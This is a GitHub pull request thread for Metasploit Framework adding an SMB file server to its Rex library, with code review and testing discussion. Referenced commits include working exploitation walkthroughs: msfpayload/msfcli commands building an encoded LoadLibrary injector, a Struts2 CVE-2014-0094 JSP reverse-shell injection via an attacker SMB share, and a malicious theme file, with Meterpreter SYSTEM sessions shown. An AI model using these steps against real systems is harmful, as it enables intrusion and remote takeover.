Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with
or
.
Download ZIP

Loading…

Implement SMB Server Protocol within Rex #3074

Merged
merged 1 commit into from

7 participants

@0x41414141

This commit adds support for implementing the SMBFileServer Module
within Rex, allowing exploit modules to create a payload to be sent
to an SMBFileServer instance. This can be useful in cases where
you would find DLL injection in an system which will read files
over a UNC share, or other instances where a payload can be delivered
over SMB.

This code borrows heavily from the ms13_071_theme module written
by Juan Vazquez, however I have performed a fair amount of protocol
analysis and debugging to provide support for delivering an arbitrary
MSF payload over UNC.
The main differences being the presence of functions to support:
-SMB CMD Trans Query Path Info (Basic and Standard)

  • SMB CMD Trans Query File Info (Standard and Internal)

This code can be considered "alpha", as I have only implemented support
for the SMB functions discovered during development of an exploit of an
arbitrary DLL injection into a server performing a "LoadLibraryA" call.*
However, this provides a basis upon which additional SMB functions can
be implemented to extend delivery of payloads over SMB.

A separate commit will expose the SMBFileServer Module within
./lib/msf/core/exploit/smb.rb

  • This exploit will be committed separately once a fix has been confirmed by the vendor.
@wchen-r7
Collaborator

ccing @jlee-r7 because he's been working on smb.

@Meatballs1
Collaborator

Awesome #2753 could definitely benefit from this :)

@Meatballs1 Meatballs1 referenced this pull request
Closed

Nvidia Mental Ray Service Exploit #3079

2 of 4 tasks complete
@jlee-r7
Collaborator

No tests, almost no docs, bad commit message. Please read CONTRIBUTING.md

lib/rex/proto/smb/server.rb
((5 lines not shown))
+require 'rex/logging'
+require 'rex/struct2'
+require 'rex/proto/smb/constants'
+require 'rex/proto/smb/utils'
+require 'rex/proto/dcerpc'
+
+module Rex
+module Proto
+module SMB
+
+###
+#
+# Runtime extension of the SMB clients that connect to the server.
+#
+###
+module ServerClient
@jlee-r7 Collaborator
jlee-r7 added a note

Belongs in its own file

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
lib/rex/proto/smb/server.rb
((71 lines not shown))
+ def initialize(port, listen_host, context = {})
+ self.listen_host = listen_host
+ self.listen_port = port
+ self.context = context
+ self.listener = nil
+ self.multiplex_id = rand(0xffff)
+ self.process_id = rand(0xffff)
+ @state = {}
+ end
+
+ #
+ # Debug
+ #
+ def dprint(msg)
+ return if not self.debugging
+ $stdout.puts "#{msg}"
@jlee-r7 Collaborator
jlee-r7 added a note

Never print to $stdout or $stderr. Use the logging methods elog, and dlog.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@0x41414141

Thanks for the feedback @jlee-r7. I've tidied up server.rb and smb.rb following your guidance.

Tested on: Windows 7 x86/x86_64

Example Output:
As this is a proto implementation, the only visible output is from exploit modules which use it. Screenshot of the module in use:
verbose

Example SMB Capture:
Negotiate Protocol Request
Negotiate Protocol Response
Session Setup AndX Request, User: anonymous; Tree Connect AndX, Path: \10.0.140.1\IPC$
Session Setup AndX Response; Tree Connect AndX
Session Setup AndX Request, User: anonymous; Tree Connect AndX, Path: \10.0.140.1\FHHJR
Session Setup AndX Response; Tree Connect AndX
Trans2 Request, QUERY_PATH_INFO, Query File Basic Info, Path: \WrxgapC.DLL
Trans2 Response, QUERY_PATH_INFO
Trans2 Request, QUERY_PATH_INFO, Query File Standard Info, Path: \WrxgapC.DLL
Trans2 Response, QUERY_PATH_INFO
NT Create AndX Request, FID: 0x7670, Path: \WrxgapC.DLL
NT Create AndX Response, FID: 0x7670
Trans2 Request, QUERY_FILE_INFO, FID: 0x7670, Query File Standard Info
Trans2 Response, FID: 0x7670, QUERY_FILE_INFO
Trans2 Request, QUERY_FILE_INFO, FID: 0x7670, Query File Standard Info
Trans2 Response, FID: 0x7670, QUERY_FILE_INFO
Trans2 Request, QUERY_FILE_INFO, FID: 0x7670, Query File Standard Info
Trans2 Response, FID: 0x7670, QUERY_FILE_INFO
Read AndX Request, FID: 0x7670, 4096 bytes at offset 0
Read AndX Response, FID: 0x7670, 4096 bytes
Read AndX Request, FID: 0x7670, 512 bytes at offset 13312
Read AndX Response, FID: 0x7670, 512 bytes
Read AndX Request, FID: 0x7670, 1024 bytes at offset 12288
Read AndX Response, FID: 0x7670, 1024 bytes
Read AndX Request, FID: 0x7670, 1536 bytes at offset 1024
Read AndX Response, FID: 0x7670, 1536 bytes
Read AndX Request, FID: 0x7670, 8704 bytes at offset 2560
Read AndX Response, FID: 0x7670, 8704 bytes
Read AndX Request, FID: 0x7670, 512 bytes at offset 11264
Read AndX Response, FID: 0x7670, 512 bytes
Read AndX Request, FID: 0x7670, 512 bytes at offset 11776
Read AndX Response, FID: 0x7670, 512 bytes

As a fair amount of the SMB code was borrowed from the ms13_071_theme module by @jvazquez-r7 i've not got any rspec tests. I'll look at getting a Yard doc put together for the smb.rb (start_smb_server) function however.

One question : when using dlog/elog, where does the log output go? I get nothing appearing in framework.log with DEBUG set.

@jlee-r7
Collaborator

elog and dlog output goes to framework.log but depends on the LogLevel datastore option. Set that to 5 and you should see everything start showing up in the log.

We really can't possibly accept this without tests.

@0x41414141

Thanks @jlee-r7. I've tried LogLevel 5 but it didn't seem to do anything. Will look into this further.

Re: tests, I'm happy to do as much as is required to get this past review, but could use some help. As I say, this was pretty heavily borrowed and extended work by @jvazquez-r7 which was already committed so didn't see much issue. I designed this module to be completely separate to existing modules (such as SMBServer) so it didn't interfere with any existing exploit modules or the framework as a whole (which is why all but one move of an end statement it's pure code addition).
I'll give rspec a bit of a read, but could use a few pointers on what sort of testing is required. Multi platform tests or just compilation/runtime things?

@0x41414141 0x41414141 referenced this pull request from a commit in 0x41414141/metasploit-framework
@0x41414141 0x41414141 Add SMB DLL Injection Server
This is an implementation of using the SMBFileServer mixin to perform
DLL injection over SMB.

Exploitation can be performed by starting the dllinjector exploit
which will remain resident until a DLL is downloaded and a session
created. By generating an executable using the windows/loadlibrary
payload it is possible to test the SMBServer mixin on various platforms,
but also serves as a novel injection method where LoadLibrary calls are
not being filtered by Antivirus or EMET.

Example Run
```
 # msfcli exploits/windows/smb/dllinjector PAYLOAD=windows/meterpreter/reverse_tcp SHARE=share DLL=exploit.dll LHOST=172.32.255.1 LPORT=4444 SRVHOST=172.32.255.1 E
 [*] Initializing modules...
 PAYLOAD => windows/meterpreter/reverse_tcp
 SHARE => share
 DLL => exploit.dll
 LHOST => 172.32.255.1
 LPORT => 4444
 SRVHOST => 172.32.255.1
 [*] Started reverse handler on 172.32.255.1:4444
 [*] Generating our malicious dll...
 [*] Starting SMB Server on: \\172.32.255.1\share\exploit.dll
 [*] Sending stage (769536 bytes) to 172.32.255.128
 [*] Meterpreter session 1 opened (172.32.255.1:4444 -> 172.32.255.128:1186) at 2014-04-24 11:18:55 +0100
 meterpreter > getsystem
 ...got system (via technique 1).
 meterpreter > getuid
 Server username: NT AUTHORITY\SYSTEM
```

Reproduction Steps
* Generate dllinjector executable (non-malicious)
```
msfpayload windows/loadlibrary DLL="\\\\1.2.3.4\\share\\exploit.dll" R | msfencode -b '\x00' -t exe -x calc.exe -k -o dllinjector.exe -e x86/shikata_ga_nai -c 3
```
* Run DLL Injection server
```
msfcli exploits/windows/smb/dllinjector PAYLOAD=windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=4444 SRVHOST=1.2.3.4 SHARE=share DLL=exploit.dll E
```
* Execute dllinjector.exe on the target host
* Monitor the generated traffic in Wireshark
* Enjoy shells.

Verification
Land #3074
Land #3075
Generate loadlibrary executable
Load dllinjector with payload
Run executable on target

Tested on:
Windows 7 (x86/x64)
Windows Server 2003
Windows Server 2008
a549296
@0x41414141 0x41414141 referenced this pull request
Merged

Add SMB DLL Injection Server #3294

0 of 5 tasks complete
@0x41414141

I have implemented an SMB DLL injection server in #3294 which can be used in combination with the loadlibrary payload to test this module.
As such, this has been successfully tested on Windows 7 x86 & x64, Windows Server 2003 and Windows Server 2008.

@0x41414141 0x41414141 referenced this pull request from a commit in 0x41414141/metasploit-framework
@0x41414141 0x41414141 Refactor ms13_071_theme to utilise `Msf::Exploit::Remote::SMBFileServer`
This commit refactors the ms13_071_theme module written by @jvazques-r7
to utilise the Rex SMBFileServer protocol and remove duplicate code from
Metasploit.

```
[*] Processing test3.msf for ERB directives.
resource (test3.msf)> use exploits/windows/fileformat/ms13_071_theme
resource (test3.msf)> set VERBOSE true
VERBOSE => true
resource (test3.msf)> set SHARE share
SHARE => share
resource (test3.msf)> set SCR exploit.scr
SCR => exploit.scr
resource (test3.msf)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (test3.msf)> set LHOST 172.32.255.1
LHOST => 172.32.255.1
resource (test3.msf)> set SRVHOST 172.32.255.1
SRVHOST => 172.32.255.1
resource (test3.msf)> set LPORT 4444
LPORT => 4444
resource (test3.msf)> exploit
[*] Started reverse handler on 172.32.255.1:4444
[*] Generating our malicious executable...
[*] Creating 'msf.theme' file ...
[+] msf.theme stored at /root/.msf4/local/msf.theme
[+] Let your victim open msf.theme
[*] Starting SMB Server on: \\172.32.255.1\share\exploit.scr
[*] Starting SMB Server on 172.32.255.1:445
[*] Sending stage (769536 bytes) to 172.32.255.129
[*] Meterpreter session 1 opened (172.32.255.1:4444 -> 172.32.255.129:1096) at 2014-04-30 12:05:46 +0100

meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

1. use exploits/windows/fileformat/ms13_071_theme
2. set payload windows/meterpreter/reverse_tcp
3. set LHOST
4. set SRVHOST
5. exploit
6. Copy msf.theme to target
7. Open theme and navigate to "Screensaver" tab
8. Enjoy shells

- [ ] Land #3074
- [ ] Land #3075
- [ ] Run exploits/windows/fileformat/ms13_071_theme
- [ ] Let target open malicious msf.theme file

* Windows XP SP3
f72d54b
lib/rex/proto/smb/server.rb
((113 lines not shown))
+ #
+ ##
+ def register(unc, contents, exe_file, hi, lo)
+ @unc = unc
+ @exe_file = exe_file
+ @hi = hi
+ @lo = lo
+ @exe = contents
+ @flags2 = 0xc807 # e807 or c807 or c001
+ end
+
+protected
+
+ # Converts bin to hex
+ def bin_to_hex(s)
+ s.unpack('H*').first
@Meatballs1 Collaborator

Check Rex::Text to see if there is an existing function that can be used for these two functions

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@Meatballs1
Collaborator

I would look at an existing Rex spec to see the level of testing required. Ideally it should exercise all of the functions at least once.

Writing a full suite of tests for SMB would be a massive undertaking... I guess some mocking of the 'client' needs to be done.

@0x41414141 0x41414141 referenced this pull request from a commit in 0x41414141/metasploit-framework
@0x41414141 0x41414141 Add CVE-2014-0094 RCE for Struts2 using JSP injection over SMB
This commit adds an exploit for the Struts2 RCE utilising the Rex
SMBFileServer Protocol support to deploy a JSP shell over SMB.

```
resource (test4.msf)> use exploits/windows/http/struts_http_jspinject
resource (test4.msf)> set VERBOSE true
VERBOSE => true
resource (test4.msf)> set PAYLOAD java/jsp_shell_reverse_tcp
PAYLOAD => java/jsp_shell_reverse_tcp
resource (test4.msf)> set URI /struts2-blank/example/HelloWorld.action
URI => /struts2-blank/example/HelloWorld.action
resource (test4.msf)> set SHARE share
SHARE => share
resource (test4.msf)> set JSP /example/HelloWorld.jsp
JSP => /example/HelloWorld.jsp
resource (test4.msf)> set SRVHOST 172.31.6.41
SRVHOST => 172.31.6.41
resource (test4.msf)> set RHOST 172.31.6.245
RHOST => 172.31.6.245
resource (test4.msf)> set RPORT 8080
RPORT => 8080
resource (test4.msf)> set LHOST 172.31.6.41
LHOST => 172.31.6.41
resource (test4.msf)> set LPORT 4444
LPORT => 4444
resource (test4.msf)> exploit
[*] Started reverse handler on 172.31.6.41:4444
[*] Generating our malicious jsp...
[*] About to start SMB Server on: \\172.31.6.41\share for
/example/HelloWorld.jsp
[*] Starting SMB Server on 172.31.6.41:445
[*] Injecting JSP to 172.31.6.245:8080 -
/struts2-blank/example/HelloWorld.action?Class.classLoader.resources.dirContext.docBase=//172.31.6.41/share
[*] 172.31.6.245:8080 - JSP payload uploaded successfully
[*] Command shell session 1 opened (172.31.6.41:4444 ->
172.31.6.245:1146) at 2014-05-01 12:09:25 +0100

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\Program Files\Apache Software Foundation\apache-tomcat-7.0.53\bin>
```

1. Install Tomcat 7.0.53
2. Download and unpack Struts 2.3.16.1 (http://www.mirrorservice.org/sites/ftp.apache.org//struts/binaries/struts-2.3.16.1-all.zip)
3. Deploy struts-2.3.16.1/apps/struts2-blank.war through Tomcat Manager interface
4. use exploits/windows/http/struts_http_jspinject
5. set PAYLOAD java/jsp_shell_reverse_tcp
6. set URI /struts2-blank/example/HelloWorld.action
7. set SHARE share
8. set JSP /example/HelloWorld.jsp
9. set SRVHOST
10. set RHOST
11. set RPORT 8080
12. set LHOST
13. set LPORT 4444
14. exploit
15. Enjoy shells

- [ ] Land #3074
- [ ] Land #3075
- [ ] Run exploits/windows/http/struts_http_jspinject

Tomcat 7.0.53 & Struts 2.3.16.1
187e7e4
@0x41414141

@Meatballs1 Thanks - i've found the relevant Rex::Text function and removed that. Do you know of any existing Rex spec's I can look at to flex the functions? Other than my 4 test cases (exploits) i've not found any other ways of flexing the SMB functions :-)

@Meatballs1
Collaborator

There doesn't appear to be any real specs for Rex server side stuff:

spec/lib/msf/core/exploit/http/server_spec.rb is probably the closest example you will get which mocks some stuff up

spec/lib/rex/proto/http/client_spec.rb has some stubbing.

I'm not really much of a ruby developer so more complicated unit tests with mocking and stubbing are mostly beyond me!

@todb-r7 todb-r7 added the library label
@hmoore-r7
Owner

Working on a review, there are no smb_server specs, but samba does include a torture test suite. Landing a server implementation seems fine to me since nothing calls it yet. I do have few nitpicks, but will back ot @0x41414141's branch after review/edits.

@hmoore-r7
Owner

I don't believe copying spec/lib/msf/core/exploit/http/server_spec.rb is appropriate until there is a Msf mixin associated with the Rex class. The existing spec covers the use of a mixin within a temporary module class, where this is just the Rex protocol specification.

@hmoore-r7
Owner

There are design issues with this server implementation:

  • All client connections are treated as the same through instance variables
  • It differs significantly from existing file server apis (resource dispatch, etc)
  • AndX secondary commands are being assumed whether they exist or not
  • Technically we already have a smb_server mixin to base this on
  • Lots of hardcoded values need to be configurable

Working through them now, but this will require a rework of the dependent PRs as well.

@hmoore-r7
Owner

Heads up that I am still working on this, but it will take at least the next week to get a reworked copy back into your branch. There is a lot of work to do in order to make the implementation multiclient friendly and work for other use cases besides just serving a static file.

@hmoore-r7 hmoore-r7 added the delayed label
@0x41414141

Cool. I have several test cases of real world exploits that I have implemented using this. Just totally lost in the Rspec world so haven't made much progress. The code needs some refactoring anyway to localise file names and be more multi client friendly. I'll work on that after your next branch update.

@todb-r7 todb-r7 added the feature label
@0x41414141 0x41414141 referenced this pull request
Merged

CVE 2014-2623 - HP Data Protector 8.10 RCE #4451

0 of 3 tasks complete
@0x41414141

@hmoore-r7 I'm back on this after a break. I'll take into account your suggestions as I work on it. To break out multiple client connections (assuming multiple payloads aswell) will require a big refactor. I can cover more AndX functions as I encounter them - so far the 5 or so different exploitation scenarios ive seen only call a few different code paths, so it may not be a full SMB implementation but works for exploit delivery as far as I have seen.
Which hardcoded values need to be configurable? I've done some refactoring today which have made it better but can expose as much to msf from Rex as required. Thanks.

@jvazquez-r7 jvazquez-r7 self-assigned this
@jvazquez-r7
Collaborator

I'm gonna try to work and hopefully land these SMB related PR. It will take me some time... just pointing I start to work on it!

@jvazquez-r7
Collaborator

Easy test retrieving a file with #3074 and #3075:

  • From windows machines:
>type \\172.16.158.1\test\test.txt
ABCDE
  • The dummy smb code:
    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
    share = 'test'
    test_file = 'test.txt'
    unc = "\\\\#{my_host}\\#{share}\\#{test_file}"
    contents = 'ABCDE'

    print_status("Starting SMB Server on: #{unc}")

    start_smb_server(unc, contents, test_file)
    while true
      sleep(1)
    end
  • Tests results

Windows 2003 SP2: Ok

Windows XP SP3: Ok

Windows 2008 R2: Ok

Windows 7 SP1: Warning I need two "types" to access the contents:

C:\Users\Administrator>type \\172.16.158.1\test\test.txt
The system cannot find the file specified.

C:\Users\Administrator>type \\172.16.158.1\test\test.txt
ABCDE
C:\Users\Administrator>

Windows 2012: Warning I need two "types" to access the contents:

C:\Users\Administrator>type \\172.16.158.1\test\test.txt
The system cannot find the file specified.

C:\Users\Administrator>type \\172.16.158.1\test\test.txt
ABCDE

Windows 8.1: Warning I need two "types" to access the contents:

C:\Users\Administrator>type \\172.16.158.1\test\test.txt
The system cannot find the file specified.

C:\Users\Administrator>type \\172.16.158.1\test\test.txt
ABCDE

@0x41414141 if you are following this PR still, do you mind to verify if you can reproduce my results? The expected result is getting the file contents on the first type always. Otherwise looks like some code should be improved.

Additional note: On the tests, all the widows machine are on domains, not workgroups.

@0x41414141

@jvazquez-r7 yes im still following this. I'll reproduce and get a fix for doing type asap. It's not something I've tried in my tests so likely just a function missing. Will also try between a domain joined and non-domain joined machine. Thanks.

@jvazquez-r7 jvazquez-r7 referenced this pull request in 0x41414141/metasploit-framework
Closed

Update Branch #1

@jvazquez-r7
Collaborator

@0x41414141 thanks, I'm working on that too, so hopefully soon we'll be able to land all this work!

See 0x41414141#1, do you mind to land it? merges #3075 and updates your working branch. So it's easier to work with the framework changes. Once landed this pull request will be automatically updated and I'll close #3075 manually so we can just keep working on this one! Thanks!

@0x41414141

@jvazquez-r7 excellent. Yes, I'll review and land your changes in my branch tomorrow and hopefully we can land this. Thanks for all your help!

@jvazquez-r7
Collaborator

Yup, will take several days, but I'm working on it! I hope we'll be able to make this happen.

That PR just updates with master changes and merges #3074 and #3075. It's a first step! I'll be helping with code cleaning, doc, specs etc, whatever is needed.

My first stopper at that moment is the "The system cannot find the file specified' on some OS's. I'm verifying if the handling which the Rex code is doing for QUERY_PATH_INFO standarad requests is good enough or needs more thinking... I think the error messages could be related to these requests handling, but just a first feeling.... I'm going comfortable with your code still!

And yeah, no rush, feel free to review my PR when you have time.

@jvazquez-r7
Collaborator

Also, pointing which FIND_FIRST2 requests handling looks incomplete, it's assuming "Level of Interest" as "Find File Both Directory Info" always I'd say. The code should extract that information from the REQUEST, and answer correctly if necessary, otherwise send an error.

@jvazquez-r7
Collaborator

Some general recommendations for library/core code:

  • Making assumptions is normally not a good idea.
  • Classes need enough YARD documentation: http://yardoc.org/
  • The lib code should be spec'd: the specs coming with this pull request definitely look weak for too much code. Just a size observation but I'm pretty sure they are not good enough to ensure a minimum of code correctness.
  • Using "magic" values are generally a bad idea. Constant must be defined and documented.
  • As a general note, on library code is a good idea to follow the ruby style guide: https://github.com/bbatsov/ruby-style-guide

That said, my first feeling is here are a lot of things to do. I'll try to help as much as possible, but definitely we need work here to make it landable!

@jvazquez-r7
Collaborator

As @hmoore-r7 pointed: Technically we already have a smb_server mixin to base this on. I would add, all the implementation has been added to the Rex code, and the mixin is just an small wraper to create and start a server instance.

In this way it's hard for modules to redefine any behavior from the file server, something which could be desired for some exploits (for example an exploit which could need to send a malicious answer while a SMB file transaction).

Just, another thing to have into account, but yup, we can start by trying to polish, fix current code, and then we do some redesign if necessary.

@jvazquez-r7 jvazquez-r7 referenced this pull request
Merged

Reorganize SMB mixins #4768

3 of 3 tasks complete
@jvazquez-r7
Collaborator

The more I read this code, the more sense has for me to move several (a lot probably) code from Rex to a mixin. While trying to make some experiments, noticed which the SMB mixins are a little bit unorganized on framework. I've tried to make a better structure here: #4768.

@0x41414141 until I get feedback on #4768 I'm going to close 0x41414141#1 because I also noticed this branch was super out of date. (On master SMBServer mixin was moved to smb_server.rb for example :(). I'm going to try to get 0x41414141#1 and then update this pull request!

@0x41414141

@jvazquez-r7 Can you check your "type" tests with the following patch (0x41414141@3110c7b); a separate function needed to be implemented for newer O/S's, so this should work first time now.

The code needs a clean up - as theres several duplicated functions im re-implementing as I see new SMB calls (having the samba source code is helping btw). I may look at a large refactor and commit some constants to move some of the "magic" values around.

Are there any commits you want me to merge? And should I combine #3074 and #3075 into a single commit?

@0x41414141

@jvazquez-r7 Also see 0x41414141@1f6aebe which works in some additional constants and removes some of the magic values from server.rb. Might go hand in hand with your work on reorganising the smb modules.

@jvazquez-r7
Collaborator

@0x41414141 thanks for the quick update!! We also got #4784 landed which is trying a more clear organization for the SMB mixins.

Tomorrow I'll test your changes on my test environments and update results. Also, will merge #3075 on this branch and update it with master changes! So hopefully tomorrow we'll have a branch updated with both rex and mixin code. I'll do PR back to you for your review and landing.

If that code works on all the testing environments, then I'll be doing my best to help with cleanup in the next days, and hopefully soon it will be able to be landed! :-D Really thanks for your fast answer and keep working on it over the months! It's really appreciated! Hopefully we'll make it happen!

@jvazquez-r7
Collaborator

yay! Initial test passed Windows XP SP3, Windows 2003 SP2, Windows 8.1, Windows 2012, Windows 2008 R2 and Windows 7SP1! Coolio.

I'm now merging #3075 here and updating with master changes including the recent smb changes! I'll have a pull request back to you hopefully today to update this branch! And then I'll be helping with code cleanup, yard, specs and whatever is needed to hopefully have it landed!

Once we've rex/mixin support we'll focus on the modules PR's. Please let me just focus on the rex/mixin code at the moment :) We can take care of all the awesome modules using SMBFileServer later :)

@todb-r7 todb-r7 added tests and removed delayed labels
@jvazquez-r7 jvazquez-r7 referenced this pull request from a commit in jvazquez-r7/metasploit-framework
@jvazquez-r7 jvazquez-r7 Merge #3074, @0x41414141 SMBFileServer mixin 01bedb7
@jvazquez-r7 jvazquez-r7 referenced this pull request in 0x41414141/metasploit-framework
Merged

Move code from Rex to mixin #2

@jvazquez-r7
Collaborator

@0x41414141 please see 0x41414141#2 (the description explains the changes!). Please feel free to review, test, discuss and once ready feel free to land so we can go ahead!! Once that pull request is landed we'll have a first starting point to clean, spec, document, etc. I'll be helping with these steps too. Bud I'd like you to review and agree with 0x41414141#2 first, thanks!!

@jvazquez-r7
Collaborator

Thanks for landing @0x41414141 ! I'm going to close #3075 so we can keep working on the mixin here! Once we're able to land this pull request, we'll be ready to work with the module! I'll also help there! More coming here!

@0x41414141 0x41414141 referenced this pull request from a commit in 0x41414141/metasploit-framework
@0x41414141 0x41414141 Modify SMB generation code to use primer based on #3074 changes to
implement Msf::Exploit::Remote::SMB::Server::Share as a mixin.
1751921
@0x41414141 0x41414141 referenced this pull request from a commit in 0x41414141/metasploit-framework
@0x41414141 0x41414141 Modify SMB generation code to use primer based on #3074 changes to
implement Msf::Exploit::Remote::SMB::Server::Share as a mixin.
14b2388
@0x41414141 0x41414141 referenced this pull request from a commit in 0x41414141/metasploit-framework
@0x41414141 0x41414141 Modify SMB generation code to use primer based on #3074 changes to
implement Msf::Exploit::Remote::SMB::Server::Share as a mixin.
34f4ae7
@0x41414141 0x41414141 referenced this pull request from a commit in 0x41414141/metasploit-framework
@0x41414141 0x41414141 Modify SMB generation code to use primer based on #3074 changes to
implement Msf::Exploit::Remote::SMB::Server::Share as a mixin.
9aef561
@0x41414141 0x41414141 referenced this pull request from a commit in 0x41414141/metasploit-framework
@0x41414141 0x41414141 Modify SMB generation code to use primer based on #3074 changes to
implement Msf::Exploit::Remote::SMB::Server::Share as a mixin.
da829d9
@0x41414141 0x41414141 referenced this pull request from a commit in 0x41414141/metasploit-framework
@0x41414141 0x41414141 Modify SMB generation code to use primer based on #3074 changes to
implement Msf::Exploit::Remote::SMB::Server::Share as a mixin.
4963992
@0x41414141 0x41414141 referenced this pull request from a commit in 0x41414141/metasploit-framework
@0x41414141 0x41414141 Modify SMB generation code to use primer based on #3074 changes to
implement Msf::Exploit::Remote::SMB::Server::Share as a mixin.
e6ecdde
@jvazquez-r7 jvazquez-r7 locked and limited conversation to collaborators
@jvazquez-r7
Collaborator

I'm locking this pull request because I'm doing changes on the code! I hope to have a new pr later today for you @0x41414141 (other way I'll notify which I'm holded hehe). Just locking it to ensure we don't overlap! I'll unlock once I do a PR back to @0x41414141 with the set of changes I'm working on just now!

@jvazquez-r7
Collaborator

Just an update! I'm working on it still! Started by doing first code cleaning, but figured out hadn't sense do half cleanup without refactor and organize code, fix some logic, etc. So.... I ended up working a lot in the code. I need more time to finish the work. Will keep working on it on monday but I'm super optimistic at this point :) I hope to have a PR ready soon.

I'm working on:

  • Refactoring the current code.
  • Normalizing the requests dispatching logic.
  • Add the necessaries templates and support to Rex in order to do better request parsing and response building.
@jvazquez-r7 jvazquez-r7 referenced this pull request in 0x41414141/metasploit-framework
Merged

First code refactor #3

@jvazquez-r7 jvazquez-r7 unlocked this conversation
@jvazquez-r7
Collaborator

@0x41414141 see 0x41414141#3, all the info int he description in the pull request! Would be helpful if you could review and land :) thanks!

@jvazquez-r7
Collaborator

Thanks @0x41414141 for landing! I've already started the documentation of the current code. I'll add some minor cleanup while documenting, but I hope nothing important. I'm going to lock this PR until I've the doc ready!

@jvazquez-r7 jvazquez-r7 locked and limited conversation to collaborators
@jvazquez-r7 jvazquez-r7 unlocked this conversation
@jvazquez-r7 jvazquez-r7 referenced this pull request in 0x41414141/metasploit-framework
Merged

Add documentation and specs #4

@jvazquez-r7
Collaborator

@0x41414141 do you mind to check documentation and specs on 0x41414141#4

If it looks good to you, once you land it, I think it's ready to go!

@0x41414141 0x41414141 Merge pull request #4 from jvazquez-r7/review_3074_documentation
Add documentation and specs. All tests pass on my end! Thanks @jvazquez-r7
c7c5270
@jvazquez-r7
Collaborator

Travis is green! Awesome! I plan to land it today so!!! :D

@jvazquez-r7 jvazquez-r7 merged commit c7c5270 into rapid7:master

1 check passed

Details continuous-integration/travis-ci/pr The Travis CI build passed
@jvazquez-r7
Collaborator

w00t! It is landed! :D:D Thanks @0x41414141 for a great collaboration and keeping with us in this long trip :-) Very cool new feature for framework!

@0x41414141

Awesome! Thanks again @jvazquez-r7 for all your hard work on this too! Cant wait to see it in an msfupdate soon!

@hmoore-r7
Owner

@0x41414141 Woohoo! Thanks for your patience!

@Meatballs1 Meatballs1 referenced this pull request
Merged

Nvidia mental ray take 3 #4884

5 of 5 tasks complete
@0x41414141 0x41414141 deleted the 0x41414141:module-smbfileserver branch
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Commits on Mar 4, 2015
  1. @0x41414141

    Merge pull request #4 from jvazquez-r7/review_3074_documentation

    0x41414141 authored
    Add documentation and specs. All tests pass on my end! Thanks @jvazquez-r7
This page is out of date. Refresh to see the latest.
Showing with 0 additions and 0 deletions.
Something went wrong with that request. Please try again.